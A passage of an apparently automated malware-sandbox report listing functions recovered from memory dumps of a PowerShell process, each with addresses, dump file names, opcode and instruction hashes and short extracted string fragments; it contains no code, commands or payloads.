                                  • Opcode Fuzzy Hash: 3d80106318bbcfcd8c43bdba6608c851390af19f45bfaebeff68312c49e2eacb
                                  • Instruction Fuzzy Hash: 18D017213005416BD214A67AE821BBF76DFDBC9266F110439D21EE7B81EE25AD160BE1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07C661AA Relevance: .0, Instructions: 21COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1754841390.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7c60000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e797ef6b897932a165b7e1ac00bbf8a5e35138a095e0e5bf2971ee5bb1919199
                                  • Instruction ID: 2bff1c0585ecfd7aa380781c4130f3799cf3b1155d68b78a6a727363f086dc44
                                  • Opcode Fuzzy Hash: e797ef6b897932a165b7e1ac00bbf8a5e35138a095e0e5bf2971ee5bb1919199
                                  • Instruction Fuzzy Hash: 8CE0863A6045019FC710E755E4917BDB792EBC4311F048929D15BC7640DF35A9178B41
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07C69044 Relevance: .0, Instructions: 20COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1754841390.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7c60000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3b79ecb11de94fd6a77e354d1ece95f1e76eabec7ed7aace9c923d81fbcbdab3
                                  • Instruction ID: 2e4b57471d4f00de5d96d380d1c94b091f8ead08e453f53b81ac838f04a59544
                                  • Opcode Fuzzy Hash: 3b79ecb11de94fd6a77e354d1ece95f1e76eabec7ed7aace9c923d81fbcbdab3
                                  • Instruction Fuzzy Hash: 6CE02B30722000CBDB841611A5CF3FC7332FBC4711F00901ED103E1180CF39AA0A9781
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D39A09 Relevance: .0, Instructions: 19COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 60ee18b752e45e7d447c52889ed90188aab39681cc538795a5408bb8a3051586
                                  • Instruction ID: fbbdb145d12c9619215be05684530ba089f59ebe7b9625e38167b295a00526a8
                                  • Opcode Fuzzy Hash: 60ee18b752e45e7d447c52889ed90188aab39681cc538795a5408bb8a3051586
                                  • Instruction Fuzzy Hash: 19D0126650A7A05FC7469B24A4141E97FA5AE4B11432980CBD048CB267C6269D47CBE2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D39C07 Relevance: .0, Instructions: 17COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6706eba1bacbcb80dc60e670410be6112c4e3cbbebdf20140af6340306b58a64
                                  • Instruction ID: ea9598b38a9d9b4a54c9954a674fd71a97055379379170694fc6b4e8b64bfbec
                                  • Opcode Fuzzy Hash: 6706eba1bacbcb80dc60e670410be6112c4e3cbbebdf20140af6340306b58a64
                                  • Instruction Fuzzy Hash: 26D05B3150D6E05BC702876468105E53FE59F4B22472D41CAD498DB2D3C7269D57C7D2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07C606C0 Relevance: .0, Instructions: 17COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1754841390.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7c60000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a22c3f6dbbcdb2eba8d5ae0f2b6713528b6d8d749840e0cfa5bcf6020fa11aca
                                  • Instruction ID: 290ff2d20a785042fa36f82982290b9038ca93f730160dd3e5b140ab134ef84a
                                  • Opcode Fuzzy Hash: a22c3f6dbbcdb2eba8d5ae0f2b6713528b6d8d749840e0cfa5bcf6020fa11aca
                                  • Instruction Fuzzy Hash: CBD05E6120C3956FC7068B10D814AAABFA65F92210F18C49FF9A5829A3C1308A16D762
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D3A1CF Relevance: .0, Instructions: 16COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 96e2cb2212b37d308986db178b1daaf0da3370437daedcf7c256a2b4b56bb935
                                  • Instruction ID: 6d3738503c46464bdc29e7df05c334631d041a623ef4b8a5a2654fff89ea8e8b
                                  • Opcode Fuzzy Hash: 96e2cb2212b37d308986db178b1daaf0da3370437daedcf7c256a2b4b56bb935
                                  • Instruction Fuzzy Hash: 8CD092B96092818FCB029F24D958585FFA5BF9621031A92C6D458CF363C6209D86DBA2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07C67F48 Relevance: .0, Instructions: 15COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1754841390.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7c60000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e2cbe9c28ce8e4df23eefb356291026b72edf966c00b0c4f5ad186778e0ae8e7
                                  • Instruction ID: 2de399b36363f3814b174df1eb499997476c7a303f4edf2ba8c9a8c4a961889e
                                  • Opcode Fuzzy Hash: e2cbe9c28ce8e4df23eefb356291026b72edf966c00b0c4f5ad186778e0ae8e7
                                  • Instruction Fuzzy Hash: 7AD0C9357087118F9768CA2DB49485373E7AB88324311C87EF85BC3744DB35EC468B44
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D388DD Relevance: .0, Instructions: 14COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 498c70e5ea3fa817a7e7c3fec3c49dc21ef5a6f518e1682e9f9ca760e3d84f0b
                                  • Instruction ID: 4a9998b3dd004612ff38cdcd51434e670d4e595cb3ecd0239f5606b114ca2824
                                  • Opcode Fuzzy Hash: 498c70e5ea3fa817a7e7c3fec3c49dc21ef5a6f518e1682e9f9ca760e3d84f0b
                                  • Instruction Fuzzy Hash: 1BD0923570A3808FCB028B24D9698A9FF75AE8621031AC6D2E085CB263C624DD49CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D388CD Relevance: .0, Instructions: 14COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b734b11a44b76a4af3fba5335dbff2b8ea7fca57387bd3d8df07a2240c70b7d0
                                  • Instruction ID: 482b441793182da596a88d4e4e565fc10f9e535d9cf8399418bb03322a8fdfea
                                  • Opcode Fuzzy Hash: b734b11a44b76a4af3fba5335dbff2b8ea7fca57387bd3d8df07a2240c70b7d0
                                  • Instruction Fuzzy Hash: 2DD09E3461D3814FC7038B24D954559FF61EE8721031AD3DBE485CB263C524DD49C751
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D3B753 Relevance: .0, Instructions: 12COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e4396140601781f9bb6d793a6a31fb747447e8c62637aa3eeff29d224ba350ac
                                  • Instruction ID: d086bb0e4fc941607831a743a8c96679f4bc807b19c882361d7c4ff4018a0776
                                  • Opcode Fuzzy Hash: e4396140601781f9bb6d793a6a31fb747447e8c62637aa3eeff29d224ba350ac
                                  • Instruction Fuzzy Hash: 89D0CA3AA00009ABCF008AD0ECA2ADDFB32FB88321F008222E6146A150C2321522DB80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D3A1F9 Relevance: .0, Instructions: 11COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7c556d00cd505118d4de0bd1665a24172b11a27220735168febef33e9ab7c1a8
                                  • Instruction ID: 564d20d01185c159006eb013a5d160a8e91f99c1a987e05b17786aac692969fd
                                  • Opcode Fuzzy Hash: 7c556d00cd505118d4de0bd1665a24172b11a27220735168febef33e9ab7c1a8
                                  • Instruction Fuzzy Hash: 9BC08CC290D3C21FCB8B862808E008A3FB86A9300478E50CAC1D4CF103D4084A1AD363
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D39081 Relevance: .0, Instructions: 10COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 408292f11dbcdffb4167296c717a0fea4df0249536946acd27bd7ee8067a69b8
                                  • Instruction ID: 0951a49a8f5ebc154f79c35a22dd9e9a51bf30457231ecff6657e91a584b6f88
                                  • Opcode Fuzzy Hash: 408292f11dbcdffb4167296c717a0fea4df0249536946acd27bd7ee8067a69b8
                                  • Instruction Fuzzy Hash: 12C08C3BB000088FCB00CB94F8849DCF379FBC8225B00C023E10183111CB305429EB00
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07C691A3 Relevance: .0, Instructions: 10COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1754841390.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7c60000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 982b20aadf9829ee5721d75cf13f8f7324f21fe450a31403fd02f1264f5214fd
                                  • Instruction ID: 69cac4e74a98e7cb2fd2959358e39764b8bcd7a332df141f96d176a6cdea09ba
                                  • Opcode Fuzzy Hash: 982b20aadf9829ee5721d75cf13f8f7324f21fe450a31403fd02f1264f5214fd
                                  • Instruction Fuzzy Hash: F1B02B3272100497CF000184F0451ECB334DBC0265F004037C2059100083354419C351
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07C690DD Relevance: .0, Instructions: 10COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1754841390.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7c60000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 821d512a02bb0a673e6f06de9a3002d3b2b211d3ab23b3bd2a1d0e087d0e26e2
                                  • Instruction ID: 4a2315fbf6632174977fd6abae0fef49b71d98570d7dc200bda8aba29fdd1166
                                  • Opcode Fuzzy Hash: 821d512a02bb0a673e6f06de9a3002d3b2b211d3ab23b3bd2a1d0e087d0e26e2
                                  • Instruction Fuzzy Hash: AAB09B36B25014CB8B04555574894FCB325D6C8165B109077D127D1041C73695194651
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07CBC156 Relevance: .0, Instructions: 10COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1756803576.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7cb0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8a4e647a5e585f265a4db112f29859b5112f0a6e31f9eb83ff584f7fff0a5f60
                                  • Instruction ID: 66e8e8afc5373e3d2b005b45721f69ed94b2a381a190473dd967dbd63d8050b7
                                  • Opcode Fuzzy Hash: 8a4e647a5e585f265a4db112f29859b5112f0a6e31f9eb83ff584f7fff0a5f60
                                  • Instruction Fuzzy Hash: FEC012B684838ADF8F24CFA4A8008D9BB70FF46204F000886F922AB101D3708634CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D37E3F Relevance: .0, Instructions: 9COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6774614728cb6b569c4d4069820ba90426695be68b2de99c94ad049e90f140ce
                                  • Instruction ID: deaefe20daa1fed4f4e9e1102cd6b042fd3912259740700e36ab36da5370e3a1
                                  • Opcode Fuzzy Hash: 6774614728cb6b569c4d4069820ba90426695be68b2de99c94ad049e90f140ce
                                  • Instruction Fuzzy Hash: CBC08C3A40C3C06FCB028BA07836BC57F20EF12300F0544A7E148D04E2C3694044DBA3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07C6889F Relevance: .0, Instructions: 9COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1754841390.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7c60000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 02aa9527cd6f916612138abc2426c9ad30a9842bace1262a8733e1cde0e6542c
                                  • Instruction ID: 7821cd088eb67c4a326efa8957b4ebaec4b600e8e71427746db5171bbaa5d6e9
                                  • Opcode Fuzzy Hash: 02aa9527cd6f916612138abc2426c9ad30a9842bace1262a8733e1cde0e6542c
                                  • Instruction Fuzzy Hash: 70B01237B25018CB8F0456D5B98A0FCF334EAC417AB400167D21A91000D73A172A8792
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  Function 07D30007 Relevance: 35.6, Strings: 25, Instructions: 4361COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 0U}l$4'}l$4'}l$4'}l$4'}l$PH}l$$}l$$}l$$}l$$}l$$}l$$}l$$}l$$}l$$}l$$}l$$}l$$}l$$}l$$}l$$}l$$}l$$}l$$}l$$}l
                                  • API String ID: 0-3164875610
                                  • Opcode ID: 54ef361b3715da912292f83bd4a85e957e033c5672f3e3aa8c7b833f2c259814
                                  • Instruction ID: 374bd38ba38860b52cfffdc49a97d14cc6346362a42e0b75eb4383834d1f3883
                                  • Opcode Fuzzy Hash: 54ef361b3715da912292f83bd4a85e957e033c5672f3e3aa8c7b833f2c259814
                                  • Instruction Fuzzy Hash: D2A33A74A092589FDB64EF64C850B9EB7B2EB84304F0144E9920DBB398DF356E85CF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D30040 Relevance: 35.6, Strings: 25, Instructions: 4326COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 0U}l$4'}l$4'}l$4'}l$4'}l$PH}l$$}l$$}l$$}l$$}l$$}l$$}l$$}l$$}l$$}l$$}l$$}l$$}l$$}l$$}l$$}l$$}l$$}l$$}l$$}l
                                  • API String ID: 0-3164875610
                                  • Opcode ID: 22d5f84c060509e7e72212c471923070896c79b0c24358e08d884bbda47c8925
                                  • Instruction ID: 1a7f63a4b4c5fcf5deb736b810ccdcec989dd5d061190ed454a76752c339b54d
                                  • Opcode Fuzzy Hash: 22d5f84c060509e7e72212c471923070896c79b0c24358e08d884bbda47c8925
                                  • Instruction Fuzzy Hash: 39A33A74A092589FDB64EF64C850B9EB7B2EB84304F0144E9920CBB398DF356E85CF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00C5EB00 Relevance: 8.8, Strings: 6, Instructions: 1295COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1674202757.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_c50000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (_}l$4c}l$`Q}l$tP}l$$}l$c}l
                                  • API String ID: 0-1325409519
                                  • Opcode ID: c1f56530eef82ef04a6618a885d5786a3d403145fa32d77fc6806212eba52494
                                  • Instruction ID: 282792bbbd7d342f0e15dd20cb7c25e484667c17c06c69961d58b4ba87d45725
                                  • Opcode Fuzzy Hash: c1f56530eef82ef04a6618a885d5786a3d403145fa32d77fc6806212eba52494
                                  • Instruction Fuzzy Hash: 24A2AC30B081445BDB189BB0DC11BAE7677EBC5784F158139A505BF788DFB2AD828BD2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00C5EB10 Relevance: 8.8, Strings: 6, Instructions: 1287COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1674202757.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_c50000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (_}l$4c}l$`Q}l$tP}l$$}l$c}l
                                  • API String ID: 0-1325409519
                                  • Opcode ID: aee9d4364eb8b04d9d3a6b581c49f1432d5903992fa5b2a9f895da73fdec4041
                                  • Instruction ID: 0e04d071f5d440f4e44b1381d16dd79c1e95ffa2abd7bf074f1987d0a058bb79
                                  • Opcode Fuzzy Hash: aee9d4364eb8b04d9d3a6b581c49f1432d5903992fa5b2a9f895da73fdec4041
                                  • Instruction Fuzzy Hash: 62A2AC30B081445BDB189BB0DC11BAE7677EBC5784F158139A505BF788DFB2AD828BD2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D352B8 Relevance: 4.2, Strings: 3, Instructions: 494COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: "]k$"]k$4'}l
                                  • API String ID: 0-1160128155
                                  • Opcode ID: 601c04df7e8506b33791025768d6c5606b712a550965a77038b04f20a53e80d8
                                  • Instruction ID: ea742c9a5fd5e997617cbb32b19e97c837664083983a7828c986a70e8c63db8a
                                  • Opcode Fuzzy Hash: 601c04df7e8506b33791025768d6c5606b712a550965a77038b04f20a53e80d8
                                  • Instruction Fuzzy Hash: 04222834A042488FCB54EFB4C855BAEB7B2FF84305F0245A9D109EB259DF399E458F92
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07D352C0 Relevance: 4.2, Strings: 3, Instructions: 491COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1758050277.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7d30000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: "]k$"]k$4'}l
                                  • API String ID: 0-1160128155
                                  • Opcode ID: 315cfcfdf858c57804bd497835ac6fe8adef3d1461eaa7df38f85ba118456147
                                  • Instruction ID: b7c6cd22d8e73a2241fec3208c4746bd88c2e09167b06a89e383385f6a0afcff
                                  • Opcode Fuzzy Hash: 315cfcfdf858c57804bd497835ac6fe8adef3d1461eaa7df38f85ba118456147
                                  • Instruction Fuzzy Hash: AC222834A042488FCB54EFB4C855BAEB7B2FF84305F0245A9D109EB259DF399E458F92
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07C6DA18 Relevance: 3.2, Strings: 2, Instructions: 683COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1754841390.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7c60000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: <uVk$<uVk
                                  • API String ID: 0-42843628
                                  • Opcode ID: 65a8a07272c67a2473ffee7388d3bc24b9e89583ceb8cdf4ea59dcbaf933b86f
                                  • Instruction ID: c54a1da29bd15f25ea18887e60e827cbdfbccb6b53f3d03f5c15d8d33df70f8f
                                  • Opcode Fuzzy Hash: 65a8a07272c67a2473ffee7388d3bc24b9e89583ceb8cdf4ea59dcbaf933b86f
                                  • Instruction Fuzzy Hash: 85327B747403019FEB25AB74D881B6EBBA2BBC5701F24846AE506AF3D1DB75EC42CB41
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07C6D0D0 Relevance: .4, Instructions: 364COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1754841390.0000000007C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7c60000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 33fb55c8278ba1bfefbd15eb81034d0ec0c984b03b860238596d1a0a16ffba58
                                  • Instruction ID: e356bedfa6618092b46780a7b88651469d8bb14e2d5a68ec3b46ff4a88b803a4
                                  • Opcode Fuzzy Hash: 33fb55c8278ba1bfefbd15eb81034d0ec0c984b03b860238596d1a0a16ffba58
                                  • Instruction Fuzzy Hash: A7E18CB4B046199FCB14DF65C4C4AAEB7F2FF88308F058568E506AB758DB34AD46CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07CB25B8 Relevance: .4, Instructions: 350COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1756803576.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7cb0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b7676fdfd249b77fd7688197d130a82591022eec7ffcaf2ef20a5dafa6744d0f
                                  • Instruction ID: fc38c340ec61c8a1ac0394f8864e8ff50529bc7ba0379cb91603d9facc13f9a9
                                  • Opcode Fuzzy Hash: b7676fdfd249b77fd7688197d130a82591022eec7ffcaf2ef20a5dafa6744d0f
                                  • Instruction Fuzzy Hash: 65C18078781340BFF7157730EC53F2A3B66ABC6B00F244569B6016F2E1CDB2A8469B85
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07CB25A9 Relevance: .3, Instructions: 349COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1756803576.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7cb0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7fa31b173a301eb6d603a9154ddd22d006aec225052beffa785ab832b09601f4
                                  • Instruction ID: 31d63ec216a11feba789719be51f65842aa2e52f99b6b13efbef3beaf13c5d59
                                  • Opcode Fuzzy Hash: 7fa31b173a301eb6d603a9154ddd22d006aec225052beffa785ab832b09601f4
                                  • Instruction Fuzzy Hash: 32C17078781340BFF7156730EC53F2A3B66ABC6B00F244569B6016F2E5CDB2A846DB85
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07AE1760 Relevance: 9.2, Strings: 7, Instructions: 435COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1751971064.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ae0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'}l$4'}l$LR5$LR5$$}l$$}l$$}l
                                  • API String ID: 0-1062736733
                                  • Opcode ID: f606e0e6a9ace308526b8b0a725112c781b4d8eb223dbe623a480b03d84daf08
                                  • Instruction ID: 8ff8aaf1101be5989c86a912153ac349bc06cf706133410713506d2121d43747
                                  • Opcode Fuzzy Hash: f606e0e6a9ace308526b8b0a725112c781b4d8eb223dbe623a480b03d84daf08
                                  • Instruction Fuzzy Hash: 43E17BF1B04229CFCB149B68C8006AEB7FAEFC6251F1580BAD566DB241DB31DC45C7A2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07AE08B0 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1751971064.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ae0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $}l$$}l$$}l$$}l
                                  • API String ID: 0-1449242823
                                  • Opcode ID: 2e07595e5d443534fc56ca8de0b78e9975dd436edaa027d23b79414289d78e8a
                                  • Instruction ID: 1ed9c4de897dffdadcc9478ccd8507bf112c394b8aa5fd7ba28ed96ecf5f0eb3
                                  • Opcode Fuzzy Hash: 2e07595e5d443534fc56ca8de0b78e9975dd436edaa027d23b79414289d78e8a
                                  • Instruction Fuzzy Hash: AC2185B63043025BEB345AA9580172BB2DEDBC4655F21842AF966DB381DEB1DC018360
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 07AE1441 Relevance: 5.1, Strings: 4, Instructions: 53COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.1751971064.0000000007AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AE0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ae0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: d`0$d`0$$}l$$}l
                                  • API String ID: 0-2339830085
                                  • Opcode ID: 7d5ec33998bd8c077462dcfa04baaae44423f04d828aff536c91039d8a6d041e
                                  • Instruction ID: ee04684e7c4a91373502b32e9b7d71a05c6872eb4614aef28d962d688063a174
                                  • Opcode Fuzzy Hash: 7d5ec33998bd8c077462dcfa04baaae44423f04d828aff536c91039d8a6d041e
